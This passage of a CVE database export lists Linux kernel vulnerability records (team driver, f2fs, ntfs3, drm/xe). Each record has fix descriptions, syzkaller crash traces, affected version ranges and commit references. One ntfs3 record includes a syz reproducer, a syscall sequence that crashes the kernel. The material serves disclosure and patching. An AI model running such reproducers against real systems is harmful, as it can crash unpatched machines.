so it returns early if port is not enabled.
Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 25029e813c4aae5fcf7118e8dd5c56e382b9a1a3 (git)<br>Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < f820e438b8ec2a8354e70e75145f05fe45500d97 (git)<br>Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 53a727a8bfd78c739e130a781192d0f6f8e03d39 (git)<br>Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 6bfb62b6010a16112dcae52f490e5e0e6abe12a3 (git)<br>Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 107d245f84cb4f55f597d31eda34b42a2b7d6952 (git)<br>Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < b71187648ef2349254673d0523fdf96d1fe3d758 (git)<br>Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 932ac51d9953eaf77a1252f79b656d4ca86163c6 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/team/team_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "25029e813c4aae5fcf7118e8dd5c56e382b9a1a3",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "f820e438b8ec2a8354e70e75145f05fe45500d97",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "53a727a8bfd78c739e130a781192d0f6f8e03d39",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "6bfb62b6010a16112dcae52f490e5e0e6abe12a3",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "107d245f84cb4f55f597d31eda34b42a2b7d6952",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "b71187648ef2349254673d0523fdf96d1fe3d758",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "932ac51d9953eaf77a1252f79b656d4ca86163c6",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/team/team_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.11"
},
{
"lessThan": "3.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:52.704Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/25029e813c4aae5fcf7118e8dd5c56e382b9a1a3"
},
{
"url": "https://git.kernel.org/stable/c/f820e438b8ec2a8354e70e75145f05fe45500d97"
},
{
"url": "https://git.kernel.org/stable/c/53a727a8bfd78c739e130a781192d0f6f8e03d39"
},
{
"url": "https://git.kernel.org/stable/c/6bfb62b6010a16112dcae52f490e5e0e6abe12a3"
},
{
"url": "https://git.kernel.org/stable/c/107d245f84cb4f55f597d31eda34b42a2b7d6952"
},
{
"url": "https://git.kernel.org/stable/c/b71187648ef2349254673d0523fdf96d1fe3d758"
},
{
"url": "https://git.kernel.org/stable/c/932ac51d9953eaf77a1252f79b656d4ca86163c6"
}
],
"title": "team: fix check for port enabled in team_queue_override_port_prio_changed()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71091",
"datePublished": "2026-01-13T15:34:52.431Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:52.704Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68796 (GCVE-0-2025-68796)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
f2fs: fix to avoid updating zero-sized extent in extent cache
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid updating zero-sized extent in extent cache
As syzbot reported:
F2FS-fs (loop0): __update_extent_tree_range: extent len is zero, type: 0, extent [0, 0, 0], age [0, 0]
------------[ cut here ]------------
kernel BUG at fs/f2fs/extent_cache.c:678!
Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
CPU: 0 UID: 0 PID: 5336 Comm: syz.0.0 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:__update_extent_tree_range+0x13bc/0x1500 fs/f2fs/extent_cache.c:678
Call Trace:
<TASK>
f2fs_update_read_extent_cache_range+0x192/0x3e0 fs/f2fs/extent_cache.c:1085
f2fs_do_zero_range fs/f2fs/file.c:1657 [inline]
f2fs_zero_range+0x10c1/0x1580 fs/f2fs/file.c:1737
f2fs_fallocate+0x583/0x990 fs/f2fs/file.c:2030
vfs_fallocate+0x669/0x7e0 fs/open.c:342
ioctl_preallocate fs/ioctl.c:289 [inline]
file_ioctl+0x611/0x780 fs/ioctl.c:-1
do_vfs_ioctl+0xb33/0x1430 fs/ioctl.c:576
__do_sys_ioctl fs/ioctl.c:595 [inline]
__se_sys_ioctl+0x82/0x170 fs/ioctl.c:583
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f07bc58eec9
In error path of f2fs_zero_range(), it may add a zero-sized extent
into extent cache, it should be avoided.
Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < 9c07bd262c13ca922adad6e7613d48505f97f548 (git)<br>Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < 72c58a82e6fb7b327e8701f5786c70c3edc56188 (git)<br>Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < e50b81c50fcbe63f50405bb40f262162ff32af88 (git)<br>Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < efe3371001f50a2d6f746b50bdc6f9f26b2089ec (git)<br>Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < 4f244c64efe628d277b916f47071adf480eb8646 (git)<br>Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < bac23833220a1f8fe8dfab7e16efa20ff64d7589 (git)<br>Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < 7c37c79510329cd951a4dedf3f7bf7e2b18dccec (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9c07bd262c13ca922adad6e7613d48505f97f548",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "72c58a82e6fb7b327e8701f5786c70c3edc56188",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "e50b81c50fcbe63f50405bb40f262162ff32af88",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "efe3371001f50a2d6f746b50bdc6f9f26b2089ec",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "4f244c64efe628d277b916f47071adf480eb8646",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "bac23833220a1f8fe8dfab7e16efa20ff64d7589",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "7c37c79510329cd951a4dedf3f7bf7e2b18dccec",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid updating zero-sized extent in extent cache\n\nAs syzbot reported:\n\nF2FS-fs (loop0): __update_extent_tree_range: extent len is zero, type: 0, extent [0, 0, 0], age [0, 0]\n------------[ cut here ]------------\nkernel BUG at fs/f2fs/extent_cache.c:678!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 0 UID: 0 PID: 5336 Comm: syz.0.0 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__update_extent_tree_range+0x13bc/0x1500 fs/f2fs/extent_cache.c:678\nCall Trace:\n \u003cTASK\u003e\n f2fs_update_read_extent_cache_range+0x192/0x3e0 fs/f2fs/extent_cache.c:1085\n f2fs_do_zero_range fs/f2fs/file.c:1657 [inline]\n f2fs_zero_range+0x10c1/0x1580 fs/f2fs/file.c:1737\n f2fs_fallocate+0x583/0x990 fs/f2fs/file.c:2030\n vfs_fallocate+0x669/0x7e0 fs/open.c:342\n ioctl_preallocate fs/ioctl.c:289 [inline]\n file_ioctl+0x611/0x780 fs/ioctl.c:-1\n do_vfs_ioctl+0xb33/0x1430 fs/ioctl.c:576\n __do_sys_ioctl fs/ioctl.c:595 [inline]\n __se_sys_ioctl+0x82/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f07bc58eec9\n\nIn error path of f2fs_zero_range(), it may add a zero-sized extent\ninto extent cache, it should be avoided."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:08.293Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9c07bd262c13ca922adad6e7613d48505f97f548"
},
{
"url": "https://git.kernel.org/stable/c/72c58a82e6fb7b327e8701f5786c70c3edc56188"
},
{
"url": "https://git.kernel.org/stable/c/e50b81c50fcbe63f50405bb40f262162ff32af88"
},
{
"url": "https://git.kernel.org/stable/c/efe3371001f50a2d6f746b50bdc6f9f26b2089ec"
},
{
"url": "https://git.kernel.org/stable/c/4f244c64efe628d277b916f47071adf480eb8646"
},
{
"url": "https://git.kernel.org/stable/c/bac23833220a1f8fe8dfab7e16efa20ff64d7589"
},
{
"url": "https://git.kernel.org/stable/c/7c37c79510329cd951a4dedf3f7bf7e2b18dccec"
}
],
"title": "f2fs: fix to avoid updating zero-sized extent in extent cache",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68796",
"datePublished": "2026-01-13T15:29:06.892Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-19T12:19:08.293Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71067 (GCVE-0-2025-71067)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-14 08:51
Title
ntfs: set dummy blocksize to read boot_block when mounting
Summary
In the Linux kernel, the following vulnerability has been resolved:
ntfs: set dummy blocksize to read boot_block when mounting
When mounting, sb->s_blocksize is used to read the boot_block without
being defined or validated. Set a dummy blocksize before attempting to
read the boot_block.
The issue can be triggered with the following syz reproducer:
mkdirat(0xffffffffffffff9c, &(0x7f0000000080)='./file1\x00', 0x0)
r4 = openat$nullb(0xffffffffffffff9c, &(0x7f0000000040), 0x121403, 0x0)
ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, &(0x7f0000000980)=0x4000)
mount(&(0x7f0000000140)=@nullb, &(0x7f0000000040)='./cgroup\x00',
&(0x7f0000000000)='ntfs3\x00', 0x2208004, 0x0)
syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0)
Here, the ioctl sets the bdev block size to 16384. During mount,
get_tree_bdev_flags() calls sb_set_blocksize(sb, block_size(bdev)),
but since block_size(bdev) > PAGE_SIZE, sb_set_blocksize() leaves
sb->s_blocksize at zero.
Later, ntfs_init_from_boot() attempts to read the boot_block while
sb->s_blocksize is still zero, which triggers the bug.
[almaz.alexandrovich@paragon-software.com: changed comment style, added
return value handling]
Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < 44a38eb4f7876513db5a1bccde74de9bc4389d43 (git)<br>Affected: 28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < 4fff9a625da958a33191c8553a03283786f9f417 (git)<br>Affected: 28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a (git)<br>Affected: 28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < d1693a7d5a38acf6424235a6070bcf5b186a360d (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ntfs3/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "44a38eb4f7876513db5a1bccde74de9bc4389d43",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
},
{
"lessThan": "4fff9a625da958a33191c8553a03283786f9f417",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
},
{
"lessThan": "b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
},
{
"lessThan": "d1693a7d5a38acf6424235a6070bcf5b186a360d",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ntfs3/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs: set dummy blocksize to read boot_block when mounting\n\nWhen mounting, sb-\u003es_blocksize is used to read the boot_block without\nbeing defined or validated. Set a dummy blocksize before attempting to\nread the boot_block.\n\nThe issue can be triggered with the following syz reproducer:\n\n mkdirat(0xffffffffffffff9c, \u0026(0x7f0000000080)=\u0027./file1\\x00\u0027, 0x0)\n r4 = openat$nullb(0xffffffffffffff9c, \u0026(0x7f0000000040), 0x121403, 0x0)\n ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, \u0026(0x7f0000000980)=0x4000)\n mount(\u0026(0x7f0000000140)=@nullb, \u0026(0x7f0000000040)=\u0027./cgroup\\x00\u0027,\n \u0026(0x7f0000000000)=\u0027ntfs3\\x00\u0027, 0x2208004, 0x0)\n syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0)\n\nHere, the ioctl sets the bdev block size to 16384. During mount,\nget_tree_bdev_flags() calls sb_set_blocksize(sb, block_size(bdev)),\nbut since block_size(bdev) \u003e PAGE_SIZE, sb_set_blocksize() leaves\nsb-\u003es_blocksize at zero.\n\nLater, ntfs_init_from_boot() attempts to read the boot_block while\nsb-\u003es_blocksize is still zero, which triggers the bug.\n\n[almaz.alexandrovich@paragon-software.com: changed comment style, added\nreturn value handling]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:41.877Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/44a38eb4f7876513db5a1bccde74de9bc4389d43"
},
{
"url": "https://git.kernel.org/stable/c/4fff9a625da958a33191c8553a03283786f9f417"
},
{
"url": "https://git.kernel.org/stable/c/b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a"
},
{
"url": "https://git.kernel.org/stable/c/d1693a7d5a38acf6424235a6070bcf5b186a360d"
}
],
"title": "ntfs: set dummy blocksize to read boot_block when mounting",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71067",
"datePublished": "2026-01-13T15:31:22.585Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-14T08:51:41.877Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71099 (GCVE-0-2025-71099)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()
In xe_oa_add_config_ioctl(), we accessed oa_config->id after dropping
metrics_lock. Since this lock protects the lifetime of oa_config, an
attacker could guess the id and call xe_oa_remove_config_ioctl() with
perfect timing, freeing oa_config before we dereference it, leading to
a potential use-after-free.
Fix this by caching the id in a local variable while holding the lock.
v2: (Matt A)
- Dropped mutex_unlock(&oa->metrics_lock) ordering change from
xe_oa_remove_config_ioctl()
(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0 , < c6d30b65b7a44dac52ad49513268adbf19eab4a2 (git) |
| | | Affected: cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0 , < 7cdb9a9da935c687563cc682155461fef5f9b48d (git) |
| | | Affected: cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0 , < dcb171931954c51a1a7250d558f02b8f36570783 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c6d30b65b7a44dac52ad49513268adbf19eab4a2",
"status": "affected",
"version": "cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0",
"versionType": "git"
},
{
"lessThan": "7cdb9a9da935c687563cc682155461fef5f9b48d",
"status": "affected",
"version": "cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0",
"versionType": "git"
},
{
"lessThan": "dcb171931954c51a1a7250d558f02b8f36570783",
"status": "affected",
"version": "cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
